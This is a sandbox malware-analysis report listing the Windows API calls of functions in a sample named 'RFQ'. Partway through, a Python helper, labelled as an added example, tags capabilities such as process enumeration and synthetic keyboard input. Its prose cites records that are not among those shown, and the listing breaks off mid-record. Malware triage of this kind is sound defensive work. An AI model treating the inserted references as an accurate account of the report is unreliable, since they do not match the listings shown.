                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 2267087916-0
                                                                            • Opcode ID: 1343cef08da0d7125aa10455724e7cd2758104a8e8bddcbfd1ab91688d959275
                                                                            • Instruction ID: dcdde139952cf61bea70e94689fc9e8afe675e606d61e99087ac9d06d6982a6d
                                                                            • Opcode Fuzzy Hash: 1343cef08da0d7125aa10455724e7cd2758104a8e8bddcbfd1ab91688d959275
                                                                            • Instruction Fuzzy Hash: 0E21917050A3419F8710EF69C88049AB7E5FE59368F108A1DF699C73E1DB70DE46CB46
                                                                            APIs
                                                                              • Part of subcall function 006E0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E0F6E
                                                                              • Part of subcall function 006E0F58: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F7A
                                                                              • Part of subcall function 006E0F58: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F89
                                                                              • Part of subcall function 006E0F58: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0F90
                                                                              • Part of subcall function 006E0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 006E0FA6
                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E1502
                                                                            • _memcmp.LIBVCRUNTIME ref: 006E1525
                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006E155B
                                                                            • HeapFree.KERNEL32(00000000), ref: 006E1562
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                            • String ID:
                                                                            • API String ID: 1592001646-0
                                                                            • Opcode ID: c10a72dfd020412f8124be83fa56a212733c881f0df21f593395363053fe2647
                                                                            • Instruction ID: d74e1ab21add6eac1c4b4647618ad349cf19e36c303291e9ef65da07a5122ca1
                                                                            • Opcode Fuzzy Hash: c10a72dfd020412f8124be83fa56a212733c881f0df21f593395363053fe2647
                                                                            • Instruction Fuzzy Hash: D8217CB1E41248AFDB10DFA9C945BEEB7B9EF85300F148059E455AB240E770AA09DB50
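The records in this section are static call listings of functions found in the image, and several of them describe a capability an analyst would want to tag quickly: the GetKeyboardState/SetKeyboardState/SendInput record, the GetForegroundWindow record whose subcall does AttachThreadInput, the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW walk, and the GetTokenInformation(TokenIntegrityLevel) subcall above. The following Python helper is an added example, not part of the Joe Sandbox report and not code from the sample; it parses the `APIs` block format used on this page (bullet, optional `Part of subcall function X:` prefix, `Name.MODULE(args), ref: ADDR`) and tags each record with the capability its call set implies. The sample input is constructed from lines on this page, and the rule labels are this example's own assumptions. Because the listing shows functions present in the binary rather than calls observed at runtime, a tag means capability, not executed behaviour, and the sort by call-site address is not a proven control-flow order.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: three function records in the shape Joe Sandbox uses for
# the "APIs" block of a disassembled function (one bullet per resolved call).
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 006EAB0F
• SetKeyboardState.USER32(00000080,?,00008000), ref: 006EAB2B
• PostMessageW.USER32(00000000,00000101,00000000), ref: 006EAB92
• SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 006EABE4
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 006ED41F
• Process32FirstW.KERNEL32(00000000,?), ref: 006ED42D
• Process32NextW.KERNEL32(00000000,?), ref: 006ED44D
• CloseHandle.KERNEL32(00000000), ref: 006ED4FA
Memory Dump Source
APIs
  • Part of subcall function 006E0F58: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 006E0F6E
• LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 006E1502
• HeapFree.KERNEL32(00000000), ref: 006E1562
Memory Dump Source
"""

@dataclass
class ApiCall:
    name: str            # exported name as listed, e.g. Process32NextW
    module: str          # KERNEL32, USER32, ADVAPI32, ...
    args: List[str]      # argument column; '?' where the plugin could not resolve a value
    ref: int             # address of the call site
    subcall_of: Optional[str] = None  # set when the line is "Part of subcall function X"

CALL_HEAD = re.compile(
    r"^\s*•\s*(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([A-Za-z_][A-Za-z_0-9]*)\.([A-Za-z0-9]+)")
REF_TAIL = re.compile(r",?\s*ref:\s*([0-9A-Fa-f]+)\s*$")

def split_args(text: str) -> List[str]:
    """Split on top-level commas only, so '00000003(TokenIntegrityLevel)' stays one argument."""
    args, cur, depth = [], [], 0
    for ch in text:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            args.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    if cur or args:
        args.append("".join(cur))
    return args

def parse_call(line: str) -> Optional[ApiCall]:
    head = CALL_HEAD.match(line)
    if not head:
        return None
    sub, name, module = head.groups()
    rest = line[head.end():]
    tail = REF_TAIL.search(rest)
    if not tail:
        return None
    argtext = rest[:tail.start()].strip()
    args = split_args(argtext[1:-1]) if argtext.startswith("(") and argtext.endswith(")") else []
    return ApiCall(name, module.upper(), args, int(tail.group(1), 16), sub.upper() if sub else None)

def parse_records(text: str) -> List[List[ApiCall]]:
    """One record per 'APIs' header; a record ends at the next section header."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = []
            records.append(cur)
        elif s in ("Strings", "Memory Dump Source", "Similarity"):
            cur = None
        elif cur is not None:
            call = parse_call(line)
            if call:
                cur.append(call)
    return records

def base_name(name: str) -> str:
    """Drop a trailing A/W so ANSI and wide variants match the same rule."""
    return re.sub(r"(?<=[a-z0-9])[AW]$", "", name)

# Capability rules (labels are this example's own): every base name must be present in the record.
RULES = [
    ("process enumeration (Toolhelp32 walk)", {"CreateToolhelp32Snapshot", "Process32First", "Process32Next"}),
    ("synthetic keyboard input", {"SetKeyboardState", "SendInput"}),
    ("input-queue attach to another thread", {"AttachThreadInput"}),
]

def classify(record: List[ApiCall]) -> List[str]:
    names = {base_name(c.name) for c in record}
    tags = [label for label, needed in RULES if needed <= names]
    # Argument-sensitive rule: GetTokenInformation matters here only for TokenIntegrityLevel.
    if any(base_name(c.name) == "GetTokenInformation"
           and any("TokenIntegrityLevel" in a for a in c.args) for c in record):
        tags.append("integrity-level query (TokenIntegrityLevel)")
    return tags

def triage(text: str) -> List[dict]:
    out = []
    for rec in parse_records(text):
        calls = sorted(rec, key=lambda c: c.ref)  # address order, not a proven control-flow order
        out.append({
            "first_ref": f"{calls[0].ref:08X}" if calls else None,
            "calls": [f"{c.name}.{c.module}" for c in calls],
            "tags": classify(rec),
        })
    return out

if __name__ == "__main__":
    for r in triage(SAMPLE):
        print(r["first_ref"], r["tags"], " -> ".join(r["calls"]))
```

Subcall lines are kept in the record they are listed under, because that is how the report attributes them, but `subcall_of` preserves the callee address so a rule can be tightened to direct calls only. The `__freea.LIBCMT` and `_memcmp.LIBVCRUNTIME` entries parse the same way, so CRT calls can be filtered out by module before classification.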
                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 0071273D
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00712757
                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00712765
                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00712773
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$AttributesLayered
                                                                            • String ID:
                                                                            • API String ID: 2169480361-0
                                                                            • Opcode ID: 367ce2afa7071595cc160e878b32ec8f5ab4ed1396099e34f424abdc63539261
                                                                            • Instruction ID: 9f4f6e714f553fe57833ad0e4a251c75bf190fa2f01b1a49a91df5d94451da74
                                                                            • Opcode Fuzzy Hash: 367ce2afa7071595cc160e878b32ec8f5ab4ed1396099e34f424abdc63539261
                                                                            • Instruction Fuzzy Hash: 4F21D331205510AFE714AB18C844FEA7BA5AF46324F248258F5268B2D3C779FC92CB95
                                                                            APIs
                                                                              • Part of subcall function 006E8CD3: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,006E7860,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?), ref: 006E8CE2
                                                                              • Part of subcall function 006E8CD3: lstrcpyW.KERNEL32(00000000,?,?,006E7860,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E8D08
                                                                              • Part of subcall function 006E8CD3: lstrcmpiW.KERNEL32(00000000,?,006E7860,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?), ref: 006E8D39
                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E7879
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E789F
                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,006E86AA,00000000,?,0000001C,?,?,00000000), ref: 006E78DA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                            • String ID: cdecl
                                                                            • API String ID: 4031866154-3896280584
                                                                            • Opcode ID: d5aac7f1be1ddf70eea7213cc1a1bc19786862ff94e4325ade76b093ef5d6244
                                                                            • Instruction ID: babab479ab47b589a04edf0dd11337ccc37e42ff291c9e9f6326ab686d0a1dc1
                                                                            • Opcode Fuzzy Hash: d5aac7f1be1ddf70eea7213cc1a1bc19786862ff94e4325ade76b093ef5d6244
                                                                            • Instruction Fuzzy Hash: 5311033A201385ABCB156F39CC48EBB77AAEF45750B50803AF902C72A0EF319901D7A5
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 007155F0
                                                                            • _wcslen.LIBCMT ref: 00715602
                                                                            • _wcslen.LIBCMT ref: 0071560D
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0071574B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend_wcslen
                                                                            • String ID:
                                                                            • API String ID: 455545452-0
                                                                            • Opcode ID: 9cf2840d7f635499d696f0d90ffb6a717fe24133420df457f6eab05a209bc23e
                                                                            • Instruction ID: 8a7304a5eeec77cd401cd5d1f7fbf658ca8841d664e28f7ed84d1cba8ce291f2
                                                                            • Opcode Fuzzy Hash: 9cf2840d7f635499d696f0d90ffb6a717fe24133420df457f6eab05a209bc23e
                                                                            • Instruction Fuzzy Hash: FC118471600604D6DB249FAC9C84AEE77ACEF51754B50812AF915D61C0DBB8D9C48F64
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60e1286568bd588393a0f0e5fc8286fc7d65affd3420a3527de1b8dcce449ec5
                                                                            • Instruction ID: 277d086fc8bc722a1fbf7148ba76bd18a155b149c107094b62e56e0d075071fc
                                                                            • Opcode Fuzzy Hash: 60e1286568bd588393a0f0e5fc8286fc7d65affd3420a3527de1b8dcce449ec5
                                                                            • Instruction Fuzzy Hash: A401F2F224531A7EF62126786CE4FE7271EDF427B9B744329B120992D2DB648CC15364
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 006E198B
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E199D
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E19B3
                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E19CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID:
                                                                            • API String ID: 3850602802-0
                                                                            • Opcode ID: ff31a51e36e5d4bdc4094f147aa2094e8f521513d7d6174180e728c1f3d00653
                                                                            • Instruction ID: 1454d2ffc4511b1d101b10165c5c103bc7f856460cd4768f518edb159c90e11a
                                                                            • Opcode Fuzzy Hash: ff31a51e36e5d4bdc4094f147aa2094e8f521513d7d6174180e728c1f3d00653
                                                                            • Instruction Fuzzy Hash: D4113C3A901218FFEF119BA5CD85FDDBB79FB05754F200095E600B7291D6716E10EB94
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 006EE11B
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 006EE14E
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 006EE164
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006EE16B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                            • String ID:
                                                                            • API String ID: 2880819207-0
                                                                            • Opcode ID: 31333be99414d028a310185e857ed6677e13ac526cc0434ec3fbd5821783be4f
                                                                            • Instruction ID: 55a533e7cc0d54089ec4da905e6bb4f18e9b3007d6b9ab8e80f98f0f7775c438
                                                                            • Opcode Fuzzy Hash: 31333be99414d028a310185e857ed6677e13ac526cc0434ec3fbd5821783be4f
                                                                            • Instruction Fuzzy Hash: 23110876A00358BBC7019FACDC05AEA7BADAB45311F04C115F811D33D0D6B58D4487A4
                                                                            APIs
                                                                            • CreateThread.KERNEL32(00000000,?,006ACF89,00000000,00000004,00000000), ref: 006AD1A8
                                                                            • GetLastError.KERNEL32 ref: 006AD1B4
                                                                            • __dosmaperr.LIBCMT ref: 006AD1BB
                                                                            • ResumeThread.KERNEL32(00000000), ref: 006AD1D9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                            • String ID:
                                                                            • API String ID: 173952441-0
                                                                            • Opcode ID: a0d3189f73ad419f4f967b929d5e9a0d3c98f6d9810fd5dde4a9ac2c00d5e9c7
                                                                            • Instruction ID: 5be91e8df5ce9e8162c54f7fe2eb63389457c8666cc472d24c0ac1c610bc923e
                                                                            • Opcode Fuzzy Hash: a0d3189f73ad419f4f967b929d5e9a0d3c98f6d9810fd5dde4a9ac2c00d5e9c7
                                                                            • Instruction Fuzzy Hash: 5301C4765441047BD7217BE5DC09BEA7A6ADF42730F108229F926826D0CB708D418AA5
                                                                            APIs
                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006879F4
                                                                            • GetStockObject.GDI32(00000011), ref: 00687A08
                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00687A12
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CreateMessageObjectSendStockWindow
                                                                            • String ID:
                                                                            • API String ID: 3970641297-0
                                                                            • Opcode ID: 366e42e3a06b6d4b3e6cc9284a88458af1c3bada1a2b4a5419b3e80e95e52451
                                                                            • Instruction ID: 711a07d33d944330d7e195e9e1682e70bb21eaa7444c78048f041bb89a96aef9
                                                                            • Opcode Fuzzy Hash: 366e42e3a06b6d4b3e6cc9284a88458af1c3bada1a2b4a5419b3e80e95e52451
                                                                            • Instruction Fuzzy Hash: 1811C072515508BFEF069F948C40EEABBAAEF0C7A5F108205FA0452150C775DD60EBA0
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 006A3AE6
                                                                              • Part of subcall function 006A3A33: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 006A3A62
                                                                              • Part of subcall function 006A3A33: ___AdjustPointer.LIBCMT ref: 006A3A7D
                                                                            • _UnwindNestedFrames.LIBCMT ref: 006A3AFB
                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 006A3B0C
                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 006A3B34
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                            • String ID:
                                                                            • API String ID: 737400349-0
                                                                            • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                            • Instruction ID: f9e7b87108d473e4910ba322361bdfd527264227e3c7c4df888dae53a563d394
                                                                            • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                            • Instruction Fuzzy Hash: 58012932100159BBCF126E95CC42EEB7B6AEF9A754F054018FE4896221C732ED61DFA4
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,006C242E,00000000,00000000,?,006B2FAA,006C242E,00000000,00000000,00000000,?,006B321B,00000006,FlsSetValue), ref: 006B3035
                                                                            • GetLastError.KERNEL32(?,006B2FAA,006C242E,00000000,00000000,00000000,?,006B321B,00000006,FlsSetValue,007222B0,FlsSetValue,00000000,00000364,?,006B2DD6), ref: 006B3041
                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,006B2FAA,006C242E,00000000,00000000,00000000,?,006B321B,00000006,FlsSetValue,007222B0,FlsSetValue,00000000), ref: 006B304F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LibraryLoad$ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 3177248105-0
                                                                            • Opcode ID: c59b4662b2ba16f6c8a3be25e3cc0461babcd984daaf9036cf3213c9af823d60
                                                                            • Instruction ID: 8b47a9d2cffabe644c1c1e02b762a1df45b6d13a4d4457ee8d79dd0911907e07
                                                                            • Opcode Fuzzy Hash: c59b4662b2ba16f6c8a3be25e3cc0461babcd984daaf9036cf3213c9af823d60
                                                                            • Instruction Fuzzy Hash: A601FC76751332EBC7315ABCAC849D67759BF05BA17114620F906D3380CB24D982C7D4
                                                                            APIs
                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 006E73D5
                                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006E73ED
                                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006E7402
                                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006E7420
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                                            • String ID:
                                                                            • API String ID: 1352324309-0
                                                                            • Opcode ID: 635fe41fb4dc511e5c3d917c89ecf3883794e7c2d558ad89d0a727ff3f262c85
                                                                            • Instruction ID: dc29b3c26c7c707e129ab6ebba865dff5a19c00c3968cbf86041da7dcdbf54b1
                                                                            • Opcode Fuzzy Hash: 635fe41fb4dc511e5c3d917c89ecf3883794e7c2d558ad89d0a727ff3f262c85
                                                                            • Instruction Fuzzy Hash: 09118EB124A350EBE321CF55EC08B927FFDEB00B04F50C529E91AD61D0E7B0E905AB90
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EAFE2
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EB007
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EB011
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,006EABF1,?,00008000), ref: 006EB044
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
• Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CounterPerformanceQuerySleep
                                                                            • String ID:
                                                                            • API String ID: 2875609808-0
                                                                            • Opcode ID: 15a09b91dd8a20d637462cd68d29517d4c82738128d9c5feb98d318f7ac13026
